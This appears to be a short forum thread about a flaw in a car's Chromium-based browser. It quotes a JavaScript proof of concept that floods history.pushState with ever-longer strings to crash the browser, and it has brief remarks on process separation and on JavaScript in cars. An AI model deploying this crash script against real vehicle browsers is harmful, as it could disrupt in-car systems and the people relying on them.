[nickodell]

Here's the vulnerability:

    <html>
    <script>
        var total = "";
        for (var i = 0; i < 100000; i++) {
            total = total + i.toString();
            history.pushState(0, 0, total);
        }
    </script>
    </html>

[root_axis]

Pretty funny. There's a joke in there about running javascript in your car.

[fulafel]

Terminology nit: the vulnerability is the improper process separation. That JS snippet is a PoC demonstrating the vulnerability.

[mister_hn]

Why do they allow JavaScript at all?

[speedgoose]

The car has a chromium based web browser. The web uses javascript.

[mister_hn]

but it isn't a must. Just block it from executing it on a car